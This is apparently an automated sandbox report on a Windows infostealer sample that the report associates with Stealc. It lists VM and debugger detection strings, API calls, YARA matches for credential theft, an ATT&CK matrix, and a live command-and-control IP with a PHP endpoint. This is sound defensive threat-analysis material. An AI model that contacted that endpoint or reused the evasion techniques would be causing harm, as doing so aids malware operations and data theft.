Source: Amcache.hve.4.dr, Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.4.dr, Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: ttFpxuMwKz.exe, 00000000.00000002.2312364166.0000000000A69000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: Hyper-V RAW3
Source: ttFpxuMwKz.exe, 00000000.00000002.2312364166.0000000000A39000.00000004.00000020.00020000.00000000.sdmp, ttFpxuMwKz.exe, 00000000.00000002.2312364166.0000000000A69000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: Hyper-V RAW
Source: Amcache.hve.4.dr, Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: ttFpxuMwKz.exe, 00000000.00000002.2312343251.00000000009E9000.00000040.00000020.00020000.00000000.sdmp, Binary or memory string: VMwareVMwarer
Source: Amcache.hve.4.dr, Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.4.dr, Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.4.dr, Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.4.dr, Binary or memory string: vmci.sys
Source: Amcache.hve.4.dr, Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.4.dr, Binary or memory string: vmci.syshbin`
Source: Amcache.hve.4.dr, Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.4.dr, Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.4.dr, Binary or memory string: VMware20,1
Source: Amcache.hve.4.dr, Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.4.dr, Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.4.dr, Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: ttFpxuMwKz.exe, 00000000.00000002.2312343251.00000000009E9000.00000040.00000020.00020000.00000000.sdmp, Binary or memory string: VMwareVMware
Source: Amcache.hve.4.dr, Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.4.dr, Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.4.dr, Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.4.dr, Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.4.dr, Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.4.dr, Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.4.dr, Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.4.dr, Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\ttFpxuMwKz.exe, API call chain: ExitProcess graph end node (graph_0-26342)
Source: C:\Users\user\Desktop\ttFpxuMwKz.exe, API call chain: ExitProcess graph end node (graph_0-26345)
Source: C:\Users\user\Desktop\ttFpxuMwKz.exe, API call chain: ExitProcess graph end node (graph_0-26184)
Source: C:\Users\user\Desktop\ttFpxuMwKz.exe, API call chain: ExitProcess graph end node (graph_0-26385)
Source: C:\Users\user\Desktop\ttFpxuMwKz.exe, API call chain: ExitProcess graph end node (graph_0-26356)
Source: C:\Users\user\Desktop\ttFpxuMwKz.exe, API call chain: ExitProcess graph end node (graph_0-26364)
Source: C:\Users\user\Desktop\ttFpxuMwKz.exe, API call chain: ExitProcess graph end node (graph_0-27696)
Source: C:\Users\user\Desktop\ttFpxuMwKz.exe, API call chain: ExitProcess graph end node (graph_0-26229)
Source: C:\Users\user\Desktop\ttFpxuMwKz.exe, Process queried: DebugPort
Source: C:\Users\user\Desktop\ttFpxuMwKz.exe, Code function: 0_2_004045C0 lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,GetProcessHeap,RtlAllocateHeap,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,LdrInitializeThunk,lstrlenA,strlen,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,VirtualProtect, 0_2_004045C0
Source: C:\Users\user\Desktop\ttFpxuMwKz.exe, Code function: 0_2_0041AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0041AD48
Source: C:\Users\user\Desktop\ttFpxuMwKz.exe, Code function: 0_2_004045C0 VirtualProtect ?,00000004,00000100,00000000 0_2_004045C0
Source: C:\Users\user\Desktop\ttFpxuMwKz.exe, Code function: 0_2_00419860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00419860
Source: C:\Users\user\Desktop\ttFpxuMwKz.exe, Code function: 0_2_00419750 mov eax, dword ptr fs:[00000030h] 0_2_00419750
Source: C:\Users\user\Desktop\ttFpxuMwKz.exe, Code function: 0_2_007E092B mov eax, dword ptr fs:[00000030h] 0_2_007E092B
Source: C:\Users\user\Desktop\ttFpxuMwKz.exe, Code function: 0_2_007F99B7 mov eax, dword ptr fs:[00000030h] 0_2_007F99B7
Source: C:\Users\user\Desktop\ttFpxuMwKz.exe, Code function: 0_2_007E0D90 mov eax, dword ptr fs:[00000030h] 0_2_007E0D90
Source: C:\Users\user\Desktop\ttFpxuMwKz.exe, Code function: 0_2_009E98AB push dword ptr fs:[00000030h] 0_2_009E98AB
Source: C:\Users\user\Desktop\ttFpxuMwKz.exe, Code function: 0_2_00417850 GetProcessHeap,HeapAlloc,GetUserNameA, 0_2_00417850
Source: C:\Users\user\Desktop\ttFpxuMwKz.exe, Code function: 0_2_0041AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0041AD48
Source: C:\Users\user\Desktop\ttFpxuMwKz.exe, Code function: 0_2_0041CEEA SetUnhandledExceptionFilter, 0_2_0041CEEA
Source: C:\Users\user\Desktop\ttFpxuMwKz.exe, Code function: 0_2_0041B33A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_0041B33A
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeCode function: 0_2_007FD151 SetUnhandledExceptionFilter,0_2_007FD151
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeCode function: 0_2_007FB5A1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_007FB5A1
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeCode function: 0_2_007FAFAF memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_007FAFAF
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeMemory protected: page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: Yara match | File source: Process Memory Space: ttFpxuMwKz.exe PID: 6480, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exe | Code function: 0_2_00419600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, | 0_2_00419600
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exe | Code function: 0_2_007F9867 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, | 0_2_007F9867
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exe | Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, | 0_2_00417B90
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exe | Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, | 0_2_007F7DF7
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exe | Code function: 0_2_00416920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess, | 0_2_00416920
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exe | Code function: 0_2_00417850 GetProcessHeap,HeapAlloc,GetUserNameA, | 0_2_00417850
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exe | Code function: 0_2_00417A30 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA, | 0_2_00417A30
                      Source: Amcache.hve.4.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                      Source: Amcache.hve.4.dr | Binary or memory string: msmpeng.exe
                      Source: Amcache.hve.4.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
                      Source: Amcache.hve.4.dr | Binary or memory string: MsMpEng.exe

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara match | File source: 0.3.ttFpxuMwKz.exe.970000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.3.ttFpxuMwKz.exe.970000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.ttFpxuMwKz.exe.7e0e67.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.ttFpxuMwKz.exe.400000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.ttFpxuMwKz.exe.7e0e67.3.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.ttFpxuMwKz.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000000.00000002.2312364166.0000000000A13000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.2072891062.0000000000970000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: ttFpxuMwKz.exe PID: 6480, type: MEMORYSTR
                      Source: Yara match | File source: dump.pcap, type: PCAP

                      Remote Access Functionality

                      barindex
                      Source: Yara match | File source: 0.3.ttFpxuMwKz.exe.970000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.3.ttFpxuMwKz.exe.970000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.ttFpxuMwKz.exe.7e0e67.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.ttFpxuMwKz.exe.400000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.ttFpxuMwKz.exe.7e0e67.3.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.ttFpxuMwKz.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000000.00000002.2312364166.0000000000A13000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.2072891062.0000000000970000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: ttFpxuMwKz.exe PID: 6480, type: MEMORYSTR
                      Source: Yara match | File source: dump.pcap, type: PCAP

                      Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                      Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 12 Native API | 1 DLL Side-Loading | 11 Process Injection | 1 Masquerading | OS Credential Dumping | 2 System Time Discovery | Remote Services | Data from Local System | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                      Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 11 Virtualization/Sandbox Evasion | LSASS Memory | 41 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 2 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                      Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 11 Disable or Modify Tools | Security Account Manager | 11 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                      Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 11 Process Injection | NTDS | 11 Process Discovery | Distributed Component Object Model | Input Capture | 12 Application Layer Protocol | Traffic Duplication | Data Destruction
                      Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 Account Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                      Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 3 Obfuscated Files or Information | Cached Domain Credentials | 1 System Owner/User Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                      DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 22 Software Packing | DCSync | 1 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                      Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | 123 System Information Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                      Source | Detection | Scanner | Label | Link
                      ttFpxuMwKz.exe | 100% | Joe Sandbox ML | |

                      No Antivirus matches

                      No Antivirus matches

                      No Antivirus matches

                      Source | Detection | Scanner | Label | Link
                      http://upx.sf.net | 0% | URL Reputation | safe |
                      No contacted domains info

                      Name | Malicious | Antivirus Detection | Reputation
                      http://62.122.184.144/ | true | | unknown
                      http://62.122.184.144/f88d87a7e087e100.php | true | | unknown

                      Name | Source | Malicious | Antivirus Detection | Reputation
                      http://62.122.184.144/f88d87a7e087e100.php) | ttFpxuMwKz.exe, 00000000.00000002.2312364166.0000000000A69000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                      http://62.122.184.144/f88d87a7e087e100.phpjk | ttFpxuMwKz.exe, 00000000.00000002.2312364166.0000000000A51000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                      http://62.122.184.144/f88d87a7e087e100.phprkJ | ttFpxuMwKz.exe, 00000000.00000002.2312364166.0000000000A51000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                      http://upx.sf.net | Amcache.hve.4.dr | false | URL Reputation: safe | unknown
                      http://62.122.184.144 | ttFpxuMwKz.exe, 00000000.00000002.2312303114.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, ttFpxuMwKz.exe, 00000000.00000002.2312364166.0000000000A13000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                      IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                      62.122.184.144 | unknown | unknown | | 49120 | GORSET-ASRU | true
                                  Joe Sandbox version:41.0.0 Charoite
                                  Analysis ID:1528814
                                  Start date and time:2024-10-08 10:17:25 +02:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 5m 16s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:22
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:ttFpxuMwKz.exe
                                  renamed because original name is a hash value
                                  Original Sample Name:56f2a1223362b66cca9bf86b7cacad0c.exe
                                  Detection:MAL
                                  Classification:mal100.troj.evad.winEXE@9/33@0/1
                                  EGA Information:
                                  • Successful, ratio: 100%
                                  HCA Information:
                                  • Successful, ratio: 100%
                                  • Number of executed functions: 23
                                  • Number of non-executed functions: 166
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                  • Excluded IPs from analysis (whitelisted): 20.42.73.29
                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                  • VT rate limit hit for: ttFpxuMwKz.exe
                      Time | Type | Description
                      04:18:43 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
                      Match | Associated Sample Name / URL | Detection | Threat Name | Context
                      62.122.184.144 | gMkw55jZRs.exe | malicious | Stealc | 62.122.184.144/f88d87a7e087e100.php
                      62.122.184.144 | QmMKz5d4j7.exe | malicious | Stealc | 62.122.184.144/f88d87a7e087e100.php
                      62.122.184.144 | c95eb189cffef0c6b222d31de3c7ed0f9cabad48a38aa.exe | malicious | Stealc, Vidar | 62.122.184.144/f88d87a7e087e100.php

                      No context

                      Match | Associated Sample Name / URL | Detection | Threat Name | Context
                      GORSET-ASRU | gMkw55jZRs.exe | malicious | Stealc | 62.122.184.144
                      GORSET-ASRU | QmMKz5d4j7.exe | malicious | Stealc | 62.122.184.144
                      GORSET-ASRU | c95eb189cffef0c6b222d31de3c7ed0f9cabad48a38aa.exe | malicious | Stealc, Vidar | 62.122.184.144
                      GORSET-ASRU | 1.exe | malicious | RedLine | 62.122.184.51
                      GORSET-ASRU | zJO55iLN3G.elf | malicious | Unknown | 31.40.39.14
                      GORSET-ASRU | 4VOPmuZZVV.exe | malicious | GoBrut | 62.122.184.95
                      GORSET-ASRU | 0Rae7oghna.elf | malicious | Mirai | 46.173.48.47
                      GORSET-ASRU | PIyT9A3jfC.exe | malicious | Pushdo | 62.122.190.121
                      GORSET-ASRU | eQcKjYOV30.exe | malicious | Pushdo | 62.122.190.121
                      GORSET-ASRU | 1EsDtA4mep.exe | malicious | Pushdo | 62.122.190.121

                      No context

                      No context
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):65536
                                  Entropy (8bit):0.9562751908421465
                                  Encrypted:false
                                  SSDEEP:192:ir6jRpnBs0BC2V2juSZr+dQzuiFfZ24IO8L:ljRpRBjV2jOyzuiFfY4IO8L
                                  MD5:8316182406DFFF1ECBE6581D91A570DE
                                  SHA1:992E7038CB6AC928C6E37CBCD3C4A4C22828DB93
                                  SHA-256:9C4EEFA59F681BBB23830AAC7597D451623F0FEB68234EDD96E52F644BAC7106
                                  SHA-512:052617CD26D2BB88E92B5416C4B61A32DB12C9943427D07517B5D9D547D2AD810C76C1AD5B4D9A1B06657DA77B9088A1E417BC7FB6AAB48ABF32742DFD90127F
                                  Malicious:true
                                  Reputation:low
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):65536
                                  Entropy (8bit):0.88881725000696
                                  Encrypted:false
                                  SSDEEP:192:OC6jRgns056rgjuSZr+3zuiFfZ24IO8+:OfjRgn56rgjO3zuiFfY4IO8+
                                  MD5:2D3B75B2F592A03C5D238F625CBB78E5
                                  SHA1:D179621A666B7D23A42E5F41570994584A725E87
                                  SHA-256:9E97A65D24F4D4A54C71DCB60153957D93669FB2908E191B694538A3357BC4BB
                                  SHA-512:AE4B20DCCE87C0D60EBD7A33EFC752C85683E6ABB90A5368F58098CEBF0082FE5F4B3CD603751A6C1F2AEF7499C726320C2769D0A6CF10CBB8247B8193DC3597
                                  Malicious:true
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):65536
                                  Entropy (8bit):0.9575940661204756
                                  Encrypted:false
                                  SSDEEP:192:hIt6jRcans056rgjuSZr+dQzuiFfZ24IO8+:h3jRpn56rgjOyzuiFfY4IO8+
                                  MD5:83302632A215D216B9216865169B178F
                                  SHA1:3DB9D8D58C9042957AABEE9205C73DB667220976
                                  SHA-256:E0DBAE8A1446FE37AE77311479A0C2F2C62EFC7190C168069D852A2D4577B7D0
                                  SHA-512:D880BE3AF8598CF2ABFD180D737E797A2A0C952F106CC244B772A16BE4C7693155D16EB93E57C16B46D23E4376D0DB3383CBEEA43C83020F496BDB94A35E9022
                                  Malicious:true
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):65536
                                  Entropy (8bit):0.9107765244604166
                                  Encrypted:false
                                  SSDEEP:192:E6jRJns056rgjuSZr+duzuiFfZ24IO8+:5jRJn56rgjO8zuiFfY4IO8+
                                  MD5:AE99F24EBD4CFABF4BDBC63739CB562D
                                  SHA1:7DFDFBDDB8D26D5179361202A693AEAE8DCE6D67
                                  SHA-256:D48F31A1D0605FDBF22C898DAC6F1B39332C056C00CCA2A4E0E3DFCA79386894
                                  SHA-512:F98852B26DFDA3BF25581708222A90D12BA3EBB4DE64D8624338C75F2C854A45FC8B2CC2FD41F0147AA530FB5878D039A8FD274320CC12D2A17D66B9AED35C00
                                  Malicious:true
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):65536
                                  Entropy (8bit):0.8883675043552418
                                  Encrypted:false
                                  SSDEEP:192:/D6jRens056rgjuSZr+3zuiFfZ24IO8+:/ejRen56rgjO3zuiFfY4IO8+
                                  MD5:D846AF3335751D6D886430C931C4ECEF
                                  SHA1:01CED0F6221B85335D2CA56407F55AEE59190B80
                                  SHA-256:51C039D1BDF300E3797D98A8686152578DDD8AEAD51B36D17A482E41FA1EDACD
                                  SHA-512:209C240D3623F9B709A9834CAA1DBEB56B7F92BA2AF897A06E051541D7CAD4E6D8EE020B145FDCA50C44E3B62717FD88BC8730AA1767C6B5FBE11861C7643BC5
                                  Malicious:true
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):65536
                                  Entropy (8bit):0.8886796174727082
                                  Encrypted:false
                                  SSDEEP:96:0mgi65ey+IWs1nh+SoA7Rh6tQXIDcQnc6rCcEhcw3rqIp+HbHg/8BRTf3Oy1F/cX:/6jRWns056rgjuSZr+3zuiFfZ24IO8+
                                  MD5:2A70A539AB00C529760E6D16E25C9AAD
                                  SHA1:7DE0211EE51C33C5CFA519BFA96C76F250C4BF36
                                  SHA-256:47E5E500BA8C0258CEED0E874799A214129AEDF838870B310C6223DA2DC279CF
                                  SHA-512:DE8BF5F3F8FC8FCBA665C49C65F97D7A1FED04C3CE28E7C1AFCA113426B7F08955F705D8995CB3C499790CCF17507761140ACBD8CBBF99FDF8005B93780F5AA6
                                  Malicious:true
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):65536
                                  Entropy (8bit):0.8885196084383683
                                  Encrypted:false
                                  SSDEEP:192:y16jRxns056rgjuSZr+3zuiFfZ24IO8+:VjRxn56rgjO3zuiFfY4IO8+
                                  MD5:512E132F088AF97390D0792BB42EC763
                                  SHA1:1AACE210BFDAA84A917D195D45A1EA6184EC5929
                                  SHA-256:4B526DF24C0C71CF2FF9144F7B6063EFD7F41952D17AF1F787862972E3EFFCBB
                                  SHA-512:D56408ED750B47FDA7F813D2656111852BD951571F517283AFF8F436B094A9B0D25F9FF72B103BB43E6B1869C83436EF7A4277818457B156E61A77F457767BD3
                                  Malicious:true
                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.8.4.9.1.0.0.0.2.2.5.7.0.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.3.4.8.d.4.9.b.-.6.f.1.4.-.4.4.d.5.-.a.0.9.3.-.b.5.b.b.7.6.0.1.e.8.5.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.a.a.4.2.f.e.0.-.b.9.9.a.-.4.2.4.4.-.9.5.9.c.-.9.6.2.d.3.5.2.6.5.3.0.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.t.t.F.p.x.u.M.w.K.z...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.5.0.-.0.0.0.1.-.0.0.1.4.-.b.e.0.1.-.e.d.9.f.5.a.1.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.6.a.1.b.8.3.3.9.c.4.f.d.e.2.5.d.7.9.f.9.7.1.1.f.5.5.9.b.5.2.8.1.0.0.0.0.f.f.f.f.!.0.0.0.0.4.8.4.6.9.9.f.e.4.e.c.d.e.2.9.d.a.1.c.5.c.7.3.8.9.2.8.8.1.c.e.a.2.f.9.8.e.b.8.a.!.t.t.F.p.x.u.M.w.K.z...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.0././.0.7.:.1.0.:.5.4.:.0.7.!.0.!.t.t.F.p.x.u.M.w.K.z...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):65536
                                  Entropy (8bit):0.9374215002294458
                                  Encrypted:false
                                  SSDEEP:192:pLFS6jREns056rgjuSZr+d+zuiFfZ24IO8+:pLdjREn56rgjOszuiFfY4IO8+
                                  MD5:AD0BCEE4E2933B06BE9746BD36AC40A5
                                  SHA1:5CCF585B5BF1F99775DC3AAE9B84E6305D7DEBF1
                                  SHA-256:AD6178AA596EB1364C94EAA6D28E0D097C42DF2446091D0C442848C0F9461FDF
                                  SHA-512:886CD38AA540D84C32E0C1CB3EEA0F686F17E8A1DF09B027D8D0C673DDF29AE300303CC40351E589961A69612FAFABD54BAC733001B47B6A9DF851AFD8C98243
                                  Malicious:true
